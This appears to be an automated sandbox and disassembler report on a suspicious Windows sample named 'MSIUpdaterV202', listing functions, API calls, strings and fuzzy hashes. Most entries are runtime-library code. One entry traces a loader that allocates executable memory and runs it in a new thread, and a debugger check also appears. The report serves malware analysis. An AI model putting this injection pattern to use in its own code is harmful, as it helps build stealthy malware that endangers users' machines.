                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 41b5fc055c79b4649f97f5f09291dcd9e15c0174de7eaf4470d02e73d448afa0
                                  • Instruction ID: 1314502278b7e5ec77bbc1ff195ec12a478365f3283f4723eafb815c51a9c070
                                  • Opcode Fuzzy Hash: 41b5fc055c79b4649f97f5f09291dcd9e15c0174de7eaf4470d02e73d448afa0
                                  • Instruction Fuzzy Hash: 7401F53330052A9BAB258E7AEC40E7E33E6EFC53207248174FA05CB195DE70C8098791
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00C078B4,00000002,00000000,?,?,?,00C078B4,?,00000000), ref: 00C0762F
                                  • GetLocaleInfoW.KERNEL32(?,20001004,00C078B4,00000002,00000000,?,?,?,00C078B4,?,00000000), ref: 00C07658
                                  • GetACP.KERNEL32(?,?,00C078B4,?,00000000), ref: 00C0766D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: f47178794c03b5a868bedc74f490379cfb8258844947d6b1388f097e6e16e21f
                                  • Instruction ID: 7a44a58096f7a012ddaf98aeb32331e44e8c38ae7cdcb2b7c395ed9ce31f1b27
                                  • Opcode Fuzzy Hash: f47178794c03b5a868bedc74f490379cfb8258844947d6b1388f097e6e16e21f
                                  • Instruction Fuzzy Hash: C721A422E08904AADB3C8F59C904BD772A6EB50F54B568624F91BC7290E733EF41D350
                                  APIs
                                    • Part of subcall function 00BFEA50: GetLastError.KERNEL32(?,00000008,00C02F56,00000000,00BF8E50), ref: 00BFEA54
                                    • Part of subcall function 00BFEA50: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00BFEAF6
                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00C07877
                                  • IsValidCodePage.KERNEL32(00000000), ref: 00C078C0
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00C078CF
                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C07917
                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C07936
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                  • String ID:
                                  • API String ID: 415426439-0
                                  • Opcode ID: b5580e82675832da864ab4827b9156b01be0667cbd9b7d8677ad0c669acb672f
                                  • Instruction ID: 076fbb24ff65c0a5789217032b508f102b9266292d48e8de43a79948215dd55d
                                  • Opcode Fuzzy Hash: b5580e82675832da864ab4827b9156b01be0667cbd9b7d8677ad0c669acb672f
                                  • Instruction Fuzzy Hash: F0517D71E04209ABEB18DFA5CC49BBE77B8BF48700F158769E515E71D0E770AA44CB60
                                  APIs
                                    • Part of subcall function 00BFEA50: GetLastError.KERNEL32(?,00000008,00C02F56,00000000,00BF8E50), ref: 00BFEA54
                                    • Part of subcall function 00BFEA50: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00BFEAF6
                                  • GetACP.KERNEL32(?,?,?,?,?,?,00BFCA5C,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C06EC8
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00BFCA5C,?,?,?,00000055,?,-00000050,?,?), ref: 00C06EF3
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00C07056
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ErrorLast$CodeInfoLocalePageValid
                                  • String ID: utf8
                                  • API String ID: 607553120-905460609
                                  • Opcode ID: 51dd0be78ef2ab69407f803782678595d82b6d522b6465de48fcf99dd6cb4dae
                                  • Instruction ID: 14199181e82c98f440c9a1b92494da5f3d32536daee434f96017fb3fec36ae34
                                  • Opcode Fuzzy Hash: 51dd0be78ef2ab69407f803782678595d82b6d522b6465de48fcf99dd6cb4dae
                                  • Instruction Fuzzy Hash: 8371F375A00306AAEB24AF75DC42FBA77A8EF05704F14446AF626D71C1EB70EA60D760
                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00BF4D72
                                  • IsDebuggerPresent.KERNEL32 ref: 00BF4E3E
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BF4E57
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00BF4E61
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                  • String ID:
                                  • API String ID: 254469556-0
                                  • Opcode ID: 5f460eef947bb624fb5d3fad329c38bf76948140f99a9c99083b04d0e0fb6887
                                  • Instruction ID: 90aabeaddf114c27f22306e97fa16bc544c5b05545aaf44f0fbf004f7b236239
                                  • Opcode Fuzzy Hash: 5f460eef947bb624fb5d3fad329c38bf76948140f99a9c99083b04d0e0fb6887
                                  • Instruction Fuzzy Hash: 1431E5B5D0522C9ADB20DFA4D9497DDBBF8AF08304F1041EAE50DAB250EB709A85CF45

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00BF10D0: __EH_prolog3_catch.LIBCMT ref: 00BF10D7
                                    • Part of subcall function 00BF10D0: _strlen.LIBCMT ref: 00BF10E9
                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00C0C285
                                    • Part of subcall function 00BF163E: _strlen.LIBCMT ref: 00BF1656
                                  • _strlen.LIBCMT ref: 00C0C2A0
                                  • _strlen.LIBCMT ref: 00C0C2B6
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00C0C2D3
                                    • Part of subcall function 00C0C1F7: VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,00C0C2E6), ref: 00C0C20B
                                    • Part of subcall function 00C0C1F7: CreateThread.KERNELBASE(00000000,00000000,00000188,MZx,00000000,00000000), ref: 00C0C23F
                                    • Part of subcall function 00C0C1F7: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,00C0C2E6), ref: 00C0C24B
                                    • Part of subcall function 00C0C1F7: CloseHandle.KERNEL32(00000000,?,?,00C0C2E6), ref: 00C0C252
                                    • Part of subcall function 00BF1BEA: _Deallocate.LIBCONCRT ref: 00BF1BF9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: _strlen$Handle$AddressAllocCloseCreateDeallocateH_prolog3_catchModuleObjectProcSingleThreadVirtualWait
                                  • String ID: Cons$Free$Madino Mino$kernel32.dll$ole
                                  • API String ID: 4115190924-2348686229
                                  • Opcode ID: c01766a2ad95968b4ea40ef63caf4cd45a820b883dc188c883e3ecf47eb8b320
                                  • Instruction ID: 7f51fa049316c12ca005058a72dc6e844c0846c4ab1195580c9a73b93cae17c1
                                  • Opcode Fuzzy Hash: c01766a2ad95968b4ea40ef63caf4cd45a820b883dc188c883e3ecf47eb8b320
                                  • Instruction Fuzzy Hash: AC01C475D00208AECB14FBE4DC569FE73F8EE44B00B100869F502A71D1DE74690AC626

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 201 bf7be8-bf7c13 call bf8b60 204 bf7c19-bf7c1c 201->204 205 bf7f87-bf7f8c call bfaff7 201->205 204->205 207 bf7c22-bf7c2b 204->207 209 bf7d28-bf7d2e 207->209 210 bf7c31-bf7c35 207->210 212 bf7d36-bf7d44 209->212 210->209 211 bf7c3b-bf7c42 210->211 213 bf7c5a-bf7c5f 211->213 214 bf7c44-bf7c4b 211->214 215 bf7d4a-bf7d4e 212->215 216 bf7ef0-bf7ef3 212->216 213->209 218 bf7c65-bf7c6d call bf786c 213->218 214->213 217 bf7c4d-bf7c54 214->217 215->216 221 bf7d54-bf7d5b 215->221 219 bf7f16-bf7f1f call bf786c 216->219 220 bf7ef5-bf7ef8 216->220 217->209 217->213 235 bf7c73-bf7c8c call bf786c * 2 218->235 236 bf7f21-bf7f25 218->236 219->205 219->236 220->205 223 bf7efe-bf7f13 call bf7f8d 220->223 224 bf7d5d-bf7d64 221->224 225 bf7d73-bf7d79 221->225 223->219 224->225 229 bf7d66-bf7d6d 224->229 230 bf7d7f-bf7da6 call bf58ae 225->230 231 bf7e90-bf7e94 225->231 229->216 229->225 230->231 247 bf7dac-bf7daf 230->247 233 bf7e96-bf7e9f call bf5c94 231->233 234 bf7ea0-bf7eac 231->234 233->234 234->219 240 bf7eae-bf7eb8 234->240 235->205 262 bf7c92-bf7c98 235->262 244 bf7eba-bf7ebc 240->244 245 bf7ec6-bf7ec8 240->245 244->219 248 bf7ebe-bf7ec2 244->248 249 bf7edf-bf7eec call bf8606 245->249 250 bf7eca-bf7edd call bf786c * 2 245->250 252 bf7db2-bf7dc7 247->252 248->219 254 bf7ec4 248->254 265 bf7eee 249->265 266 bf7f4b-bf7f60 call bf786c * 2 249->266 279 bf7f26 call bfdf7a 250->279 257 bf7dcd-bf7dd0 252->257 258 bf7e71-bf7e84 252->258 254->250 257->258 259 bf7dd6-bf7dde 257->259 258->252 263 bf7e8a-bf7e8d 258->263 259->258 264 bf7de4-bf7df8 259->264 268 bf7c9a-bf7c9e 262->268 269 bf7cc4-bf7ccc call bf786c 262->269 263->231 270 bf7dfb-bf7e0c 264->270 265->219 297 bf7f65-bf7f82 call bf5a9a call bf8506 call bf86c3 call bf847d 266->297 298 bf7f62 266->298 268->269 274 bf7ca0-bf7ca7 268->274 284 bf7cce-bf7cee call bf786c * 2 call bf8606 269->284 285 bf7d30-bf7d33 269->285 275 bf7e0e-bf7e1f call bf80c3 270->275 276 bf7e32-bf7e3f 270->276 280 bf7cbb-bf7cbe 274->280 281 bf7ca9-bf7cb0 274->281 294 bf7e43-bf7e6b call bf7b68 275->294 295 bf7e21-bf7e2a 275->295 276->270 287 bf7e41 276->287 293 bf7f2b-bf7f46 call bf5c94 call bf8277 call bf5842 279->293 280->205 280->269 281->280 282 bf7cb2-bf7cb9 281->282 282->269 282->280 284->285 315 bf7cf0-bf7cf5 284->315 285->212 292 bf7e6e 287->292 292->258 293->266 294->292 295->275 301 bf7e2c-bf7e2f 295->301 297->205 298->297 301->276 315->279 318 bf7cfb-bf7d0e call bf828f 315->318 318->293 322 bf7d14-bf7d20 318->322 322->279 323 bf7d26 322->323 323->318
                                  APIs
                                  • type_info::operator==.LIBVCRUNTIME ref: 00BF7D07
                                  • ___TypeMatch.LIBVCRUNTIME ref: 00BF7E15
                                  • _UnwindNestedFrames.LIBCMT ref: 00BF7F67
                                  • CallUnexpected.LIBVCRUNTIME ref: 00BF7F82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2751267872-393685449
                                  • Opcode ID: 09f113ae21c2eb08c236ce5f6b828e66bc2dbc4cf590bccc153d732750e94e70
                                  • Instruction ID: b899724eac73abd566115bb9b1cc5b70b51c774ba160d369dde2bb5acb8b4e2b
                                  • Opcode Fuzzy Hash: 09f113ae21c2eb08c236ce5f6b828e66bc2dbc4cf590bccc153d732750e94e70
                                  • Instruction Fuzzy Hash: C7B1387184420DAFCF25DFA5C8819BEBBF5EF14310B1441EAEA116B212DB31EE59CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 324 c0163c-c0164c 325 c01666-c01668 324->325 326 c0164e-c01661 call bfb0c5 call bfb0d8 324->326 328 c019bc-c019c9 call bfb0c5 call bfb0d8 325->328 329 c0166e-c01674 325->329 342 c019d4 326->342 347 c019cf call bf8ecf 328->347 329->328 332 c0167a-c016a6 329->332 332->328 335 c016ac-c016b5 332->335 338 c016b7-c016ca call bfb0c5 call bfb0d8 335->338 339 c016cf-c016d1 335->339 338->347 340 c016d7-c016db 339->340 341 c019b8-c019ba 339->341 340->341 345 c016e1-c016e5 340->345 346 c019d7-c019da 341->346 342->346 345->338 349 c016e7-c016fe 345->349 347->342 352 c01700-c01703 349->352 353 c01743-c01749 349->353 357 c01712-c01718 352->357 358 c01705-c0170d 352->358 355 c0171a-c01731 call bfb0c5 call bfb0d8 call bf8ecf 353->355 356 c0174b-c01752 353->356 390 c018ef 355->390 359 c01754 356->359 360 c01756-c01774 call c01dc1 call bfed98 * 2 356->360 357->355 362 c01736-c01741 357->362 361 c017c3-c017d6 358->361 359->360 395 c01791-c017b9 call c01be2 360->395 396 c01776-c0178c call bfb0d8 call bfb0c5 360->396 365 c01892-c0189b call c07fe6 361->365 366 c017dc-c017e8 361->366 368 c017c0 362->368 380 c0190c 365->380 381 c0189d-c018af 365->381 366->365 370 c017ee-c017f0 366->370 368->361 370->365 374 c017f6-c01817 370->374 374->365 378 c01819-c0182f 374->378 378->365 384 c01831-c01833 378->384 386 c01910-c01926 ReadFile 380->386 381->380 382 c018b1-c018c0 GetConsoleMode 381->382 382->380 387 c018c2-c018c6 382->387 384->365 389 c01835-c01858 384->389 391 c01984-c0198f GetLastError 386->391 392 c01928-c0192e 386->392 387->386 393 c018c8-c018e0 ReadConsoleW 387->393 389->365 397 c0185a-c01870 389->397 394 c018f2-c018fc call bfed98 390->394 398 c01991-c019a3 call bfb0d8 call bfb0c5 391->398 399 c019a8-c019ab 391->399 392->391 400 c01930 392->400 402 c01901-c0190a 393->402 403 c018e2 GetLastError 393->403 394->346 395->368 396->390 397->365 408 c01872-c01874 397->408 398->390 404 c019b1-c019b3 399->404 405 c018e8-c018ee call bfb07e 399->405 401 c01933-c01945 400->401 401->394 413 c01947-c0194b 401->413 402->401 403->405 404->394 405->390 408->365 417 c01876-c0188d 408->417 419 c01964-c01971 413->419 420 c0194d-c0195d call c01356 413->420 417->365 425 c01973 call c014ad 419->425 426 c0197d-c01982 call c011ae 419->426 431 c01960-c01962 420->431 432 c01978-c0197b 425->432 426->432 431->394 432->431
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3907804496
                                  • Opcode ID: 970f42ae8fb8e48eb12142af07904a32e4f25db3ec66a1779b3562b9419b0138
                                  • Instruction ID: 301e38c900829b5915a2aa0b07e6d2c50afda2c72720e8a6db5d4159a3c854ad
                                  • Opcode Fuzzy Hash: 970f42ae8fb8e48eb12142af07904a32e4f25db3ec66a1779b3562b9419b0138
                                  • Instruction Fuzzy Hash: 7AB1F574A04249AFDB15DF99C880BBDFBF2BF49300F188199E9519B2D2CB719E41CB60
                                  APIs
                                  • GetCPInfo.KERNEL32(015512D0,015512D0,?,7FFFFFFF,?,00C09B89,015512D0,015512D0,?,015512D0,?,?,?,?,015512D0,?), ref: 00C0995F
                                  • __alloca_probe_16.LIBCMT ref: 00C09A1A
                                  • __alloca_probe_16.LIBCMT ref: 00C09AA9
                                  • __freea.LIBCMT ref: 00C09AF4
                                  • __freea.LIBCMT ref: 00C09AFA
                                  • __freea.LIBCMT ref: 00C09B30
                                  • __freea.LIBCMT ref: 00C09B36
                                  • __freea.LIBCMT ref: 00C09B46
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16$Info
                                  • String ID:
                                  • API String ID: 127012223-0
                                  • Opcode ID: e04ab13cafd662b594f1d07125c917f7bfa6e3decb3fa085486761bc46d9f7c0
                                  • Instruction ID: cd6dd902ff06f33e1dd428b202bf5dbd0ddda90caaf3b3983f1ee4dbff6fe455
                                  • Opcode Fuzzy Hash: e04ab13cafd662b594f1d07125c917f7bfa6e3decb3fa085486761bc46d9f7c0
                                  • Instruction Fuzzy Hash: 6271C272904209ABDF319F549C82FAFB7E9DF85720F290059E928A72C3D7359E04D7A1
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00BF42E3
                                  • __alloca_probe_16.LIBCMT ref: 00BF430F
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00BF434E
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BF436B
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00BF43AA
                                  • __alloca_probe_16.LIBCMT ref: 00BF43C7
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BF4409
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00BF442C
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                  • String ID:
                                  • API String ID: 2040435927-0
                                  • Opcode ID: a7134790e41007439ac31fae6d3b11365ed7d32f36598ad4d271dcadd0629405
                                  • Instruction ID: af3e1b7b9060a08fbad9957c8ced3ada6d7a9cff8d1ffd0b82c34971432f6cb1
                                  • Opcode Fuzzy Hash: a7134790e41007439ac31fae6d3b11365ed7d32f36598ad4d271dcadd0629405
                                  • Instruction Fuzzy Hash: 0E517B7250020EABEB209FA4CC85FBF7BE9EB44754F1545A5FE05A7250DB348D18DB60
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00BF20FA
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00BF2104
                                  • int.LIBCPMT ref: 00BF211B
                                    • Part of subcall function 00BF2653: std::_Lockit::_Lockit.LIBCPMT ref: 00BF2664
                                    • Part of subcall function 00BF2653: std::_Lockit::~_Lockit.LIBCPMT ref: 00BF267E
                                  • codecvt.LIBCPMT ref: 00BF213E
                                  • std::_Facet_Register.LIBCPMT ref: 00BF2155
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00BF2175
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00BF2182
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                  • String ID:
                                  • API String ID: 2133458128-0
                                  • Opcode ID: 85608269589158f349bc34b7b42d9e16279704d5d778f9ad4daf9da11d023b59
                                  • Instruction ID: ffe541f07023d24950dadf72c16187ac7a624293c06b413e1441321393d56f01
                                  • Opcode Fuzzy Hash: 85608269589158f349bc34b7b42d9e16279704d5d778f9ad4daf9da11d023b59
                                  • Instruction Fuzzy Hash: 2B01C43190011D9BCB05EB64C8557BE77E2EF84720F140488F71167292CFB59F09C791
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00BF218F
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00BF2199
                                  • int.LIBCPMT ref: 00BF21B0
                                    • Part of subcall function 00BF2653: std::_Lockit::_Lockit.LIBCPMT ref: 00BF2664
                                    • Part of subcall function 00BF2653: std::_Lockit::~_Lockit.LIBCPMT ref: 00BF267E
                                  • ctype.LIBCPMT ref: 00BF21D3
                                  • std::_Facet_Register.LIBCPMT ref: 00BF21EA
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00BF220A
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00BF2217
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                  • String ID:
                                  • API String ID: 2958136301-0
                                  • Opcode ID: 1fdce5637c28c485bfac6569616d421687c3ed9b64f0b4f9b3ca7b08fc8f2654
                                  • Instruction ID: 58817003e76b4eb8cce64b8e05a34d89e3c15457658fde9ccc629b66fe0999cd
                                  • Opcode Fuzzy Hash: 1fdce5637c28c485bfac6569616d421687c3ed9b64f0b4f9b3ca7b08fc8f2654
                                  • Instruction Fuzzy Hash: 5B01D23190011D9BCB05EFA4C856BBEB7F1EF84710F240488E611AB292CFB49F09CB91
                                  APIs
                                  • GetLastError.KERNEL32(?,?,00BF7871,00BF5E40,00BF4F12), ref: 00BF7888
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BF7896
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BF78AF
                                  • SetLastError.KERNEL32(00000000,00BF7871,00BF5E40,00BF4F12), ref: 00BF7901
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: b7e881887900a84b28bccdd60e7630cd4f036f1c38b0ee550ecfe386350abbe2
                                  • Instruction ID: b3fd671e3140a5b2c85ed47e0c76dafb902c6bc9a5d2f90ae40192d293421ef7
                                  • Opcode Fuzzy Hash: b7e881887900a84b28bccdd60e7630cd4f036f1c38b0ee550ecfe386350abbe2
